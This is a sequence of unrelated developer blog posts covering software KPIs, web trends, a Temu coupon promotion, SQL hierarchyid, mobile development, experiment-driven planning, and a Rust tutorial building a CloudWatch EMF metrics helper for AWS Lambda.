## Introduction In the fast-paced world of software development, tracking progress and ensuring project success can be challenging. Key Performance Indicators (KPIs) are crucial metrics that help project managers and teams monitor performance, identify issues, and drive improvements. This guide explores essential KPIs that can lead to successful software development projects. ## Why KPIs Matter in Software Development KPIs provide quantifiable measurements that help in assessing the efficiency, effectiveness, and health of a software development project. They enable teams to: - Monitor progress against goals - Identify areas for improvement - Make data-driven decisions - Ensure timely delivery and quality ## Essential KPIs for Software Development ### Velocity - **Definition:** The amount of work a team completes in a given iteration (e.g., sprint). - **Importance:** Helps predict future performance and plan releases. ### Cycle Time - **Definition:** The time it takes to complete a task from start to finish. - **Importance:** Indicates the efficiency of the development process and helps identify bottlenecks. ### Lead Time - **Definition:** The total time from a request being made until it is delivered. - **Importance:** Measures overall efficiency and responsiveness of the team. ### Code Quality - **Definition:** Measured using metrics like code churn (frequency of code changes), code complexity, and number of defects. - **Importance:** Ensures the maintainability and reliability of the software. ### Defect Density - **Definition:** The number of defects per size of the code (e.g., per 1000 lines of code). - **Importance:** Provides insights into the quality of the codebase and helps focus on areas needing improvement. ### Test Coverage - **Definition:** The percentage of code covered by automated tests. - **Importance:** Ensures that the code is thoroughly tested, reducing the likelihood of bugs in production. 
### Customer Satisfaction (CSAT) - **Definition:** A measure of how satisfied customers are with the software product. - **Importance:** Directly correlates with the success and usability of the product. ### Burnout Rate - **Definition:** The rate at which team members are experiencing burnout. - **Importance:** Ensures the well-being of the team, which is crucial for long-term productivity. ### Release Burndown - **Definition:** Tracks the progress towards completing a release, showing remaining work versus time. - **Importance:** Helps in tracking whether the project is on schedule. ## Implementing KPIs in Your Project ### Define Clear Objectives Understand what you aim to achieve with your project and select KPIs that align with these goals. ### Choose Relevant KPIs Not all KPIs are suitable for every project. Choose those that provide the most valuable insights for your specific context. ### Regular Monitoring Regularly track and review KPIs to stay informed about the project’s health and progress. ### Adjust as Necessary Be flexible and ready to adjust your KPIs as the project evolves and new priorities emerge. ### Communicate KPIs Ensure all team members understand the KPIs, their importance, and how they are measured. ## Conclusion KPIs are vital tools in the arsenal of software development teams, providing a clear picture of project performance and areas for improvement. By selecting the right KPIs and monitoring them consistently, teams can ensure successful project delivery, high-quality software, and satisfied customers. Implement these KPIs in your projects to enhance transparency, drive performance, and achieve your development goals.
davitacols
1,909,141
Embracing the Evolution of Web Development: Trends and Best Practices for 2024
As we stride into 2024, the landscape of web development continues to evolve at an astonishing pace....
0
2024-07-02T16:58:33
https://dev.to/abdul_rahman_19d731503a82/embracing-the-evolution-of-web-development-trends-and-best-practices-for-2024-56ca
As we stride into 2024, the landscape of web development continues to evolve at an astonishing pace. With new technologies, frameworks, and best practices emerging, developers need to stay ahead of the curve to build robust, scalable, and efficient web applications. In this article, we'll explore the latest trends shaping the web development industry and provide insights into best practices that can help developers thrive in this dynamic environment.

## 1. The Rise of Jamstack Architecture

Jamstack (JavaScript, APIs, and Markup) is gaining significant traction due to its ability to deliver faster, more secure, and scalable websites. By decoupling the frontend from the backend, Jamstack allows developers to build static websites that are pre-rendered and served via CDNs, resulting in improved performance and security. Tools like Gatsby, Next.js, and Nuxt.js are becoming staples in the Jamstack ecosystem, enabling developers to create rich, interactive experiences with ease.

## 2. Progressive Web Apps (PWAs) Take Center Stage

Progressive Web Apps continue to blur the lines between web and native applications. PWAs offer an app-like experience with features such as offline access, push notifications, and home screen installation. With Google and other tech giants advocating for PWAs, developers can leverage tools like Workbox and Lighthouse to optimize performance and ensure their applications meet the PWA standards.

## 3. Embracing AI and Machine Learning

Artificial Intelligence (AI) and Machine Learning (ML) are transforming the way we develop web applications. From chatbots and recommendation systems to advanced data analytics, AI-driven solutions are enhancing user experiences and driving business value. Libraries like TensorFlow.js and Brain.js allow developers to integrate AI capabilities directly into their web applications, making it easier to implement intelligent features without extensive backend infrastructure.

## 4. Serverless Architecture and Microservices

Serverless computing and microservices architecture are revolutionizing backend development. By abstracting server management and breaking down applications into smaller, independent services, developers can achieve greater scalability and flexibility. Platforms like AWS Lambda, Azure Functions, and Google Cloud Functions are leading the charge, enabling developers to focus on writing code rather than managing infrastructure.

## 5. Enhancing User Experience with Motion UI

Motion UI is becoming an essential tool for creating engaging and interactive web experiences. Smooth animations, transitions, and micro-interactions can significantly enhance user engagement and satisfaction. Libraries such as Framer Motion and GreenSock (GSAP) provide developers with powerful tools to implement sophisticated animations that bring their applications to life.

## 6. The Importance of Web Accessibility

Web accessibility is no longer an afterthought; it is a fundamental aspect of web development. Ensuring that websites are accessible to users with disabilities is not only a legal requirement in many regions but also a moral imperative. Developers should adhere to the Web Content Accessibility Guidelines (WCAG) and leverage tools like axe and Lighthouse to audit and improve the accessibility of their web applications.

## 7. The Shift Towards Low-Code/No-Code Solutions

Low-code and no-code platforms are democratizing web development by allowing non-developers to create web applications with minimal coding knowledge. While these platforms are not a replacement for traditional development, they offer valuable tools for rapid prototyping and development. Tools like Bubble, Webflow, and OutSystems are gaining popularity, enabling faster development cycles and empowering a broader range of individuals to contribute to the web development process.

## Best Practices for Modern Web Development

To succeed in the ever-changing world of web development, it's essential to adhere to best practices that ensure code quality, performance, and maintainability. Here are a few key practices to keep in mind:

- **Write Clean and Modular Code:** Maintain a clean codebase by following coding standards and using modular components. This enhances readability, reusability, and collaboration within development teams.
- **Optimize Performance:** Prioritize performance optimization techniques such as lazy loading, code splitting, and image optimization. Tools like Lighthouse and WebPageTest can help identify performance bottlenecks.
- **Implement Robust Testing:** Ensure the reliability of your applications by implementing comprehensive testing strategies, including unit tests, integration tests, and end-to-end tests. Frameworks like Jest, Mocha, and Cypress are invaluable for testing various aspects of your application.
- **Stay Informed:** Continuously learn and stay updated with the latest trends, tools, and best practices in web development. Engage with the developer community through forums, blogs, conferences, and social media to stay ahead of the curve.

## Conclusion

The web development landscape in 2024 is marked by rapid innovation and constant change. By embracing emerging trends such as Jamstack, PWAs, AI, and serverless architecture, and by adhering to best practices, developers can create cutting-edge web applications that deliver exceptional user experiences. Stay curious, keep learning, and continue to push the boundaries of what's possible in [web development](https://www.iamrahman.in).
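As a tiny illustration of the lazy-loading idea from the performance tips above, here is a sketch of deferring expensive work until it is first needed. The helper and the `getChart` example are hypothetical, not a specific library API:

```typescript
// Sketch: lazy initialization — the expensive factory runs only on the
// first access, and the cached result is reused afterwards.
type Lazy<T> = () => T;

function lazy<T>(factory: () => T): Lazy<T> {
  let value: T;
  let initialized = false;
  return () => {
    if (!initialized) {
      value = factory(); // expensive work happens exactly once
      initialized = true;
    }
    return value;
  };
}

// Hypothetical example: pretend this builds a heavy charting widget.
let buildCount = 0;
const getChart = lazy(() => {
  buildCount++;
  return { render: () => `chart built ${buildCount} time(s)` };
});
```

In a real app the same principle shows up as dynamic `import()` for code splitting or `loading="lazy"` on images; the helper above just makes the mechanism explicit.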
abdul_rahman_19d731503a82
1,909,140
Hello Everyone!
I have just started here, so I don't know my way around yet. But I hope to get familiar soon. 😊
0
2024-07-02T16:56:27
https://dev.to/emon12700/hello-everyone-2akh
I have just started here, so I don't know my way around yet. But I hope to get familiar soon. 😊
emon12700
1,909,138
Temu New User Coupon [AAV67880]: Up To 75% OFF For First-Time Users
Offers: AAV67880 Up to 75% discount for new users Up to 90% discount on select items and clearance...
0
2024-07-02T16:50:51
https://dev.to/sonuprasad/temu-new-user-coupon-aav67880-up-to-75-off-for-first-time-users-216d
temu, temu100off, temudiscount, temucouponcod
- Offers: AAV67880 - Up to 75% discount for new users - Up to 90% discount on select items and clearance sales - 40% discount for existing users Validity: July 2024 Our Temu first-time user coupon codes are designed just for new customers, offering the biggest discounts and the best deals currently available on Temu. To maximize your savings, download the Temu app and apply our Temu new user coupon during checkout.
sonuprasad
1,909,137
🚀 🚀 Working with hierarchical data in .Net Core using the hierarchyid data type.(.Net Core 8) 🚀 🚀
🚀 HierarchyId Data Type The hierarchyid data type was introduced with SQL Server 2008. It’s...
23,809
2024-07-02T16:48:55
https://dev.to/ahmedshahjr/working-with-hierarchical-data-in-net-core-using-the-hierarchyid-data-typenet-core-8-1315
webdev, dotnet, beginners, programming
🚀 HierarchyId Data Type

The hierarchyid data type was introduced with SQL Server 2008. It’s specifically designed to represent and manipulate hierarchical data. Hierarchical data structures contain parent-child relationships, and hierarchyid provides an efficient way to store and query such data. In the context of databases, both Azure SQL and SQL Server support this data type.

🚀 Querying Hierarchical Data

Once you’ve stored hierarchical data using hierarchyid, you can perform various queries. Finding Ancestors and Descendants: you can query for the ancestors (parents) and descendants (children) of specific items.

💡 Depth-Based Queries

Retrieve all items at a certain depth within the hierarchy.

🚀 Benefits of Using HierarchyId

It simplifies querying hierarchical data, making it easier and faster. The hierarchyid type is more aligned with .NET norms than SqlHierarchyId. It’s designed to work seamlessly with Entity Framework Core (EF Core). hierarchyid is a valuable tool for managing hierarchical data in .NET Core applications. 🌟

If you have any specific questions or need further assistance, feel free to ask! 😊

GitHub documentation => https://github.com/efcore/EFCore.SqlServer.HierarchyId
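Conceptually, `hierarchyid` stores a materialized path such as `/1/3/2/`. As a rough, language-agnostic sketch (this is not the SQL Server or EF Core API — the helper names here are made up), the two query types above boil down to simple path operations:

```typescript
// Sketch of the materialized-path idea behind hierarchyid.
// Paths are assumed to look like "/" (root) or "/1/3/" (level 2).

// Mirrors the spirit of hierarchyid's GetLevel(): depth in the tree.
function getLevel(path: string): number {
  return path.split("/").filter(Boolean).length;
}

// Mirrors the spirit of IsDescendantOf(); like SQL Server, a node
// counts as a descendant of itself.
function isDescendantOf(path: string, ancestor: string): boolean {
  return path.startsWith(ancestor);
}
```

A depth-based query then reduces to filtering rows where the level equals the desired depth, and finding a subtree reduces to a prefix match — essentially what the database does with its compact binary encoding.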
ahmedshahjr
1,909,124
My Journey into Mobile Development with HNG Internship.
Hi there! I'm excited to share my journey as I start the HNG Internship and dive into mobile...
0
2024-07-02T16:47:38
https://dev.to/ogodo_moses_dacb80df1025b/my-journey-into-mobile-development-with-hng-internship-5o5
programming, tutorial, flutter, intern
Hi there! I'm excited to share my journey as I start the HNG Internship and dive into mobile development. Mobile apps are a big part of our lives, and making them is both fun and challenging. Let's talk about the platforms we use to build these apps and the common software architecture patterns.

**MOBILE APP DEVELOPMENT PLATFORMS**

1. **Native Development:** This means building apps specifically for either Android or iOS. For Android, you use Java or Kotlin, and for iOS, you use Swift or Objective-C.

**ADVANTAGES:** i. Great Performance: Native apps run fast and smoothly. ii. Full Access to Features: You can use all the features of the device.

**DISADVANTAGES:** i. Time-Consuming: You need to build separate apps for Android and iOS. ii. More Maintenance: Maintaining two codebases is a lot of work.

2. **Cross-Platform Development:** This means building one app that works on both Android and iOS. Tools like React Native and Flutter make this possible.

**ADVANTAGES:** i. Saves Time: You write the code once and it works on both platforms. ii. Cheaper: It's less expensive than building two separate apps.

**DISADVANTAGES:** i. Slower Performance: These apps might not be as fast as native apps. ii. Limited Features: Some device features might not be fully available.

**Common Software Architecture Patterns**

**1. Model-View-Controller (MVC):** This pattern divides the app into three parts: the Model (data), the View (UI), and the Controller (logic).

**ADVANTAGES:** i. Organized Code: Easy to manage and test. ii. Clear Structure: Each part has a specific role.

**DISADVANTAGES:** i. Complex for Big Apps: Can get complicated. ii. Interconnected Parts: Changes in one part can affect others.

**2. Model-View-ViewModel (MVVM):** This is great for apps with complex user interfaces. It separates the UI from the business logic.

**ADVANTAGES:** i. Clean Separation: Better organization and easier to update. ii. Automatic Updates: The UI updates automatically when data changes.
**DISADVANTAGES:** i. Learning Curve: Takes time to learn. ii. More Complex: Adds some overhead to the project.

**Why I Joined the HNG Internship**

I joined the HNG Internship to learn from the best and grow my skills in mobile development. The program offers real-world projects and a chance to work with talented developers from around the world. It’s a great opportunity to improve my coding skills and build awesome apps. If you want to learn more about the HNG Internship, check out [this](https://hng.tech/internship) link and [this](https://hng.tech/hire). It’s an amazing program!
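To make the MVVM idea above concrete, here is a minimal, framework-free sketch — in TypeScript for brevity (a mobile app would use Dart, Kotlin, or Swift, and all names here are illustrative). The View subscribes to the ViewModel and re-renders automatically when the data changes:

```typescript
type Listener<T> = (value: T) => void;

// A tiny ViewModel: holds state and notifies subscribed Views on change.
class ViewModel<T> {
  private listeners: Listener<T>[] = [];
  constructor(private value: T) {}

  get current(): T {
    return this.value;
  }

  subscribe(listener: Listener<T>): void {
    this.listeners.push(listener);
    listener(this.value); // give the View its initial state
  }

  update(next: T): void {
    this.value = next;
    this.listeners.forEach((l) => l(next)); // "automatic" UI updates
  }
}

// A pretend View rendering a counter label
const counter = new ViewModel(0);
const rendered: string[] = [];
counter.subscribe((n) => rendered.push(`Count: ${n}`));
counter.update(1);
```

The key point of the pattern is visible here: the View never reaches into the Model directly; it only reacts to ViewModel notifications.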
ogodo_moses_dacb80df1025b
1,909,103
Using experiments to ship faster
Eliminate all the hard stuff early.
0
2024-07-02T16:47:00
https://dev.to/joshnuss/using-experiments-to-ship-faster-5329
productivity, webdev, programming
---
title: Using experiments to ship faster
published: true
description: Eliminate all the hard stuff early.
tags: productivity, webdev, programming
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/el4tjgo2h58m6bb8wy1m.png
published_at: 2024-07-02 16:47 +0000
---

Has this ever happened to you? You're eager to start coding, so you open your editor and start smashing the keyboard. After a few weeks, something unexpected happens: you encounter a major blocker. Now you have to rework the codebase to get around the problem, and a lot of high-quality work gets scrapped. This is very expensive and wasteful, and it happens all too frequently. But there is a way to reduce the chance this happens.

## Avoiding "Fake progress"

When a project starts, there can be pressure to show fast progress. But unfortunately, not all progress is equal. Quick progress might make your stakeholders happy early on. But at what expense? If it's at the expense of completing the project, or long delays later, then it can be considered "fake progress". If we start by building the plumbing - the obvious and boring parts we already know how to do - are we really making meaningful progress? Just checking off busywork won't reduce the overall uncertainty of the project. It just delays the more challenging stuff into the future. What if we could change that?

## Finding the real work

Meaningful progress comes from solving difficult issues as early as possible. This is real work. It has the potential to reduce the cost of projects by orders of magnitude. Because time is very precious, the faster we can locate real problems, the more meaningful headway we'll make. What we need is a way to locate the biggest unknowns, frictions, and blockers as early as possible.

## Improving work with experiments

One solution is to make a list of the hard parts (aka "unknowns") and experiment with those before you start building the solution.
These experiments are great because, with just a small amount of work, they can remove large uncertainties from the project. They allow us to encounter uncertainties as early as possible and eliminate them before they become costly blockers. Instead of starting a project by writing code in a complex codebase and wasting energy on integration and quality, experimenting allows us to test problems in isolation, without the cost of integration. This keeps re-work low, because we're not undoing complex production code written at a high quality bar. Once most of the unknowns are resolved, coding becomes a lot easier. It's just a matter of connecting the discovered solutions together, just like snapping together a bunch of LEGOs.

## How to experiment

Next time you're starting a project, do this:

1. **Collect** a list of unknowns. These are things you think will be hard, or haven't done before.
2. **Prioritize** the list to tackle the most critical issues first.
3. **Estimate** how much time each experiment will take. For example, 1-2 hours each.

Then for each experiment:

1. **Build** a minimal solution, being mindful of the timebox.
2. **Capture** the result. Either in a GitHub repo or a code snippet on your machine.
3. **Document** the solution or any caveats encountered.

Once you've worked through your list, and assuming you haven't encountered any major blockers, you're ready to start building! yay

## Finding success

To make sure your experiments are a success, here are a few things to be mindful of:

### Be careful of time management

Don't overdo it. For a 6-week project, a good number of experiments is 10-15. These should take 1-3 days to finish. It's important to timebox these.

### Long experiments are bad experiments

Keep your experiments small. Break them into smaller chunks if needed. If they're taking too long, it could be a tell that your project is too big and that the scope should be reduced.
### Don't experiment with obvious things

For example, if you've built a login form before, it's not an unknown for you anymore. Don't spend time on it. Of course, if you've never used OAuth before, then building an OAuth integration is worth an experiment. What's unknown depends a lot on each developer's own experience.

### Be very careful when re-using an experiment

Sometimes it can be helpful to build a series of experiments where each one depends on the code of the last, but sometimes it's not. Remember to always consider what the integration cost is. A key point of experimenting is avoiding the cost of connecting parts together.

### Keep the quality low

Don't write clean code. Don't write DRY or SOLID code. Don't write tests. The only thing we want is a working solution. It can be super ugly. Worry about quality later, when you start building.

## Conclusion

A great way to conserve energy is through early experimentation. By dealing with uncertainty at the start of the project, the danger of encountering large blockers later is greatly diminished. This eliminates re-work and unexpected costs, and creates a more enjoyable and calm development experience. Happy coding ✌️
joshnuss
1,902,676
AWS Lambda Rust EMF metrics helper
Photo by Isaac Smith on Unsplash Introduction In the AWS Lambda ecosystem, there is an...
0
2024-07-02T16:44:06
https://dev.to/aws-builders/aws-lambda-rust-emf-metrics-helper-4glp
aws, rust, serverless
Photo by <a href="https://unsplash.com/@isaacmsmith?utm_content=creditCopyText&utm_medium=referral&utm_source=unsplash">Isaac Smith</a> on <a href="https://unsplash.com/photos/pen-om-paper-AT77Q0Njnt0?utm_content=creditCopyText&utm_medium=referral&utm_source=unsplash">Unsplash</a>

# Introduction

In the AWS Lambda ecosystem, there is an awesome set of tools created to cover common scenarios when creating serverless functions. They are gathered together as `Lambda Powertools` and are available in a few languages. At the moment there is no version of `Powertools` for Rust (one will be created eventually). I saw this as a great opportunity to learn by building small helpers for AWS Lambda in Rust. I am not attempting to replicate the Powertools suite. Instead, I'll focus on implementing specific functionalities.

# Metrics

I decided to start by creating utilities for CloudWatch custom metrics. When running AWS Lambda, we have two main options for putting custom metrics into CloudWatch: using the SDK, or printing a log shaped according to the Embedded Metric Format (EMF). The latter is much cheaper and faster, but it requires some boilerplate. EMF lets you publish up to 100 metric points at once and define up to 30 dimensions.

# Goal

I'll create a library that lets us:

- create metrics for a defined namespace and dimensions
- add more dimensions, up to the maximum limit defined by AWS
- gracefully handle going beyond the limit of 100 metric points
- publish metrics automatically once the Lambda function finishes

As you can see, not all functionality provided by the original Powertools is covered, yet the library should already be usable (and hopefully even useful).

# Implementation

The complete code for this implementation is available [in the GitHub repository](https://github.com/szymon-szym/lambda_helpers_metrics).

I need two main pieces. The first is the set of types (structs, enums) that map to the EMF. I can use some `serde` magic to seamlessly serialize them to JSON.
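For orientation, a single EMF log line has roughly this shape — a sketch based on the EMF specification, with namespace, dimension, and metric names mirroring the example used later in this post:

```json
{
  "_aws": {
    "Timestamp": 1719936000000,
    "CloudWatchMetrics": [
      {
        "Namespace": "custom_lambdas",
        "Dimensions": [["service"]],
        "Metrics": [
          { "Name": "test_count", "Unit": "Count", "StorageResolution": 60 }
        ]
      }
    ]
  },
  "service": "dummy_service",
  "test_count": 10.4
}
```

Note that the dimension value and the metric value live at the top level of the JSON, next to the `_aws` metadata — which is why flattening comes in handy during serialization.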
The second piece would be a struct with some methods to hold a mutable state of current metrics and allow actions on it. ## Types EMF format is defined [here](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Embedded_Metric_Format_Specification.html). After translating it to Rust I got something like this. ```Rust // lib.rs //... /// https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Embedded_Metric_Format_Specification.html#CloudWatch_Embedded_Metric_Format_Specification_structure_metricdefinition #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct MetricDefinition { name: String, unit: MetricUnit, storage_resolution: u64, } /// https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Embedded_Metric_Format_Specification.html#CloudWatch_Embedded_Metric_Format_Specification_structure_metricdirective #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct MetricDirective { namespace: String, dimensions: Vec<Vec<DimensionName>>, metrics: Vec<MetricDefinition>, } /// https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Embedded_Metric_Format_Specification.html#CloudWatch_Embedded_Metric_Format_Specification_structure_metadata #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct MetadataObject { timestamp: i64, cloud_watch_metrics: Vec<MetricDirective>, } #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct CloudWatchMetricsLog { #[serde(rename = "_aws")] aws: MetadataObject, #[serde(flatten)] dimensions: Dimensions, #[serde(flatten)] metrics_values: MetricValues, } // ... ``` - I use `new type pattern` to keep my types expressive ```Rust // lib.rs // ... 
#[derive(Debug, Serialize, Deserialize, Clone)] #[serde(rename_all = "PascalCase")] pub struct Dimensions(HashMap<String, String>); #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct MetricValues(HashMap<String, f64>); #[derive(Debug, Serialize, Deserialize)] pub struct DimensionName(String); #[derive(Debug, Serialize, Deserialize)] pub struct Namespace(String); // ... ``` - I decided to keep `metrics values` as a float. For some metrics, I would use integers, but I didn't want to add more complexity at this point - Metrics units are defined with enums ```Rust // lib. rs // ... #[derive(Debug, Serialize, Deserialize, Clone, PartialEq)] pub enum MetricUnit { Seconds, Microseconds, Milliseconds, Bytes, Kilobytes, Megabytes, Gigabytes, Terabytes, Count, BytesPerSecond, KilobytesPerSecond, MegabytesPerSecond, GigabytesPerSecond, TerabytesPerSecond, BitsPerSecond, KilobitsPerSecond, MegabitsPerSecond, GigabitsPerSecond, TerabitsPerSecond, CountPerSecond, } // ... ``` The only logic I added here is the `into` function, which handles conversion to string, needed for printing the log. As we will see in the moment, this implementation requires some fixes, but I intentionally leave it as is for now, to showcase `clippy` capabilities. ```Rust // lib.rs // ... impl CloudWatchMetricsLog { pub fn into(self) -> String { serde_json::to_string(&self).unwrap() } } // ... ``` ## Domain Let's first define the domain types ```Rust // lib.rs // ... #[derive(Debug, Serialize, Deserialize)] pub struct Metric { name: String, unit: MetricUnit, value: f64, } // ... #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "PascalCase")] pub struct Metrics { namespace: Namespace, dimensions: Dimensions, metrics: Vec<Metric>, } // ... ``` Now we need some functionalities. ### Add dimension This might fail, so no matter if we like it or not, we need to return `Result` and leave the responsibility of handling it to the caller. 
I will work on error types separately, so for now the `Err` is just a `String`

```Rust
// lib.rs
// ...
impl Metrics {
    // ...
    pub fn try_add_dimension(&mut self, key: &str, value: &str) -> Result<(), String> {
        if self.dimensions.0.len() >= MAX_DIMENSIONS {
            Err("Too many dimensions".into())
        } else {
            self.dimensions.0.insert(key.to_string(), value.to_string());
            Ok(())
        }
    }
    // ...
```

### Add metric

At first glance, this operation should return `Result` too, because we might reach the limit of 100 metrics. Additionally, we can't post two data points for the same metric in one log. Both cases are easily solvable - it is enough to flush the current metrics and start collecting metrics from scratch. The trade-off is that we expect metrics not to impact the performance of our lambda function. On the other hand, printing the log with a limited size sounds like a better strategy than returning an `Err` and forcing the caller to deal with it.

```Rust
// lib.rs
// ...
impl Metrics {
    // ...
    pub fn add_metric(&mut self, name: &str, unit: MetricUnit, value: f64) {
        if self.metrics.len() >= MAX_METRICS
            || self.metrics.iter().any(|metric| metric.name == name)
        {
            self.flush_metrics();
        }
        self.metrics.push(Metric {
            name: name.to_string(),
            unit,
            value,
        });
    }
    // ...
```

### Flush metrics

Flushing metrics means simply printing them to the console and removing the current entries from our object

```Rust
// lib.rs
// ...
impl Metrics {
    // ...
    pub fn flush_metrics(&mut self) {
        let payload = self.format_metrics().into();
        println!("{payload}");
        self.metrics = Vec::new();
    }
    // ...
```

### Format metrics

The main part of the logic, which is at the same time just transforming domain types to the AWS EMF types

```Rust
// lib.rs
// ...
pub fn format_metrics(&self) -> CloudWatchMetricsLog { let metrics_definitions = self .metrics .iter() .map(|entry| entry.into()) .collect::<Vec<MetricDefinition>>(); let metrics_entries = vec![MetricDirective { namespace: self.namespace.0.to_string(), dimensions: vec![self .dimensions .0 .keys() .map(|key| DimensionName(key.to_string())) .collect()], metrics: metrics_definitions, }]; let cloudwatch_metrics = MetadataObject { timestamp: Utc::now().timestamp_millis(), cloud_watch_metrics: metrics_entries, }; let metrics_values = self .metrics .iter() .map(|metric| (metric.name.to_string(), metric.value)) .collect::<HashMap<_, _>>(); let cloudwatch_metrics_log = CloudWatchMetricsLog { aws: cloudwatch_metrics, dimensions: self.dimensions.clone(), metrics_values: MetricValues(metrics_values), }; cloudwatch_metrics_log } // ... ``` ## Flush metrics automatically at the end of the function One more thing to implement. the user can manually flush metrics, but it is not very convenient. Let's flush metrics once the function ends, which means that our `metrics` object goes out of scope ```Rust // lib.rs // ... impl Drop for Metrics { fn drop(&mut self) { println!("Dropping metrics, publishing metrics"); self.flush_metrics(); } } ``` ## Unit tests Business logic isn't very complex, so I can create a few test cases with basic assertions. 
```Rust #[cfg(test)] mod tests { use super::*; #[test] fn should_create_metrics() { let mut metrics = Metrics::new("test_namespace", "service", "dummy_service"); metrics.add_metric("test_metric_count", MetricUnit::Count, 1.0); metrics.add_metric("test_metric_seconds", MetricUnit::Seconds, 22.0); let log = metrics.format_metrics(); assert_eq!(log.aws.cloud_watch_metrics[0].namespace, "test_namespace"); assert_eq!(log.aws.cloud_watch_metrics[0].metrics[0].name, "test_metric_count"); assert_eq!(log.aws.cloud_watch_metrics[0].metrics[0].unit, MetricUnit::Count); assert_eq!( log.aws.cloud_watch_metrics[0].metrics[0].storage_resolution, 60 ); assert_eq!(log.metrics_values.0.get("test_metric_count"), Some(&1.0)); assert_eq!( log.aws.cloud_watch_metrics[0].metrics[1].name, "test_metric_seconds" ); assert_eq!(log.aws.cloud_watch_metrics[0].metrics[1].unit, MetricUnit::Seconds); assert_eq!( log.aws.cloud_watch_metrics[0].metrics[1].storage_resolution, 60 ); assert_eq!(log.dimensions.0.len(), 1); } #[test] fn should_handle_duplicated_metric() { let mut metrics = Metrics::new("test", "service", "dummy_service"); metrics.add_metric("test", MetricUnit::Count, 2.0); metrics.add_metric("test", MetricUnit::Count, 1.0); assert_eq!(metrics.metrics.len(), 1); } #[test] fn should_not_fail_over_100_metrics() { let mut metrics = Metrics::new("test", "service", "dummy_service"); for i in 0..100 { metrics.add_metric(&format!("metric{i}"), MetricUnit::Count, i as f64); } assert_eq!(metrics.metrics.len(), 100); metrics.add_metric("over_100", MetricUnit::Count, 11.0); assert_eq!(metrics.metrics.len(), 1); } #[test] fn should_fail_if_over_30_dimensions() { let mut metrics = Metrics::new("test", "service", "dummy_service"); for i in 0..29 { metrics .try_add_dimension(&format!("key{i}"), &format!("value{i}")) .unwrap(); } match metrics.try_add_dimension("key31", "value31") { Ok(_) => assert!(false, "expected error"), Err(_) => assert!(true), } } } ``` ## Example In the `examples` directory, I 
created the basic lambda function with AWS SAM. ```Rust // ... async fn function_handler(event: LambdaEvent<Request>) -> Result<Response, Error> { // Extract some useful info from the request let command = event.payload.command; let mut metrics = Metrics::new("custom_lambdas", "service", "dummy_service"); metrics.try_add_dimension("application", "customer_service"); metrics.add_metric("test_count", MetricUnit::Count, 10.4); metrics.add_metric("test_seconds", MetricUnit::Seconds, 15.0); metrics.add_metric("test_count", MetricUnit::Count, 10.6); // Prepare the response let resp = Response { req_id: event.context.request_id, msg: format!("Command {}.", command), }; // Return `Response` (it will be serialized to JSON automatically by the runtime) Ok(resp) } // ... ``` After `sam build && sam deploy` we can test the function from the console ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y9ek21rjb0j1fsp3a4er.png) As expected, there are two logs to the metrics. The first was emitted when we added the `test_count` metric for the second time, and the last one was emitted when the function finished. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dghm1ttam14arpafsav0.png) Finally, I can see metrics added to the `CloudWatch` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/038jkc18k6s57z1ejmbg.png) ## Cleaning up The library works, which is great, but there are probably things to improve. Let's run `clippy` - the great Rust linter. ```bash cargo clippy -- -D clippy::pedantic ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fvup64w8d3xu1mtccfar.png) The `pedantic` linter is pretty opinionated, but this is totally ok for me. All right, let's improve the code. 
### Panics

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xq2c5mc30vc9wljdexod.png)

The `new` function won't panic, since there are no dimensions added yet, so adding the first one is safe. This is a good place to use an `allow` statement to make it clear that this behavior is intentionally handled this way.

```Rust
impl Metrics {
    #[allow(clippy::missing_panics_doc)]
    pub fn new(namespace: &str, dimension_key: &str, dimension_value: &str) -> Self {
        let mut metrics = Self {
            dimensions: Dimensions(HashMap::new()),
            namespace: Namespace(namespace.to_string()),
            metrics: Vec::new(),
        };
        // UNWRAP: for new metrics there is no risk of reaching max number of dimensions
        metrics
            .try_add_dimension(dimension_key, dimension_value)
            .unwrap();
        metrics
    }
```

The second `panic` is more interesting. The `into` function for `CloudWatchMetricsLog` might fail if `Serialize` decides to panic, or if there are `HashMap`s with non-string keys. Instead of `Into` I need to implement `TryInto`. Put differently: I shouldn't have created a bare `into` function in the first place, but implemented the `TryInto` trait instead.

```Rust
impl TryInto<String> for CloudWatchMetricsLog {
    type Error = String;

    fn try_into(self) -> Result<String, Self::Error> {
        serde_json::to_string(&self).map_err(|err| err.to_string())
    }
}
```

For now, I leave `Error` as a `String`, because I am not going to return it to the caller. Instead, I will only print an error

```Rust
/// Flushes the metrics to stdout in a single payload
/// If an error occurs during serialization, it will be printed to stderr
pub fn flush_metrics(&mut self) {
    let serialized_metrics: Result<String, _> = self.format_metrics().try_into();
    match serialized_metrics {
        Ok(payload) => println!("{payload}"),
        Err(err) => eprintln!("Error when serializing metrics: {err}"),
    }
    self.metrics = Vec::new();
}
```

### must_use and other lints

Clippy (pedantic) flags public functions as candidates for the `#[must_use]` attribute. The `new` function for `Metrics` feels like a good match.
```Rust
impl Metrics {
    #[allow(clippy::missing_panics_doc)]
    #[must_use]
    pub fn new(namespace: &str, dimension_key: &str, dimension_value: &str) -> Self {
        // ...
```

I have also followed other `clippy` suggestions, including docs formatting. Speaking of which...

## Documentation

Rust has a great story for creating documentation. Doc comments let us use markdown and, eventually, are transformed into a web page. After adding comments to the crate in general, and to the public structs and functions, we have pretty nice docs out-of-the-box. I run

```bash
cargo doc --open --lib
```

The browser automatically opens a page with my docs:

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kaieu8vw7rl8u2lqvoar.png)

## Publish crate

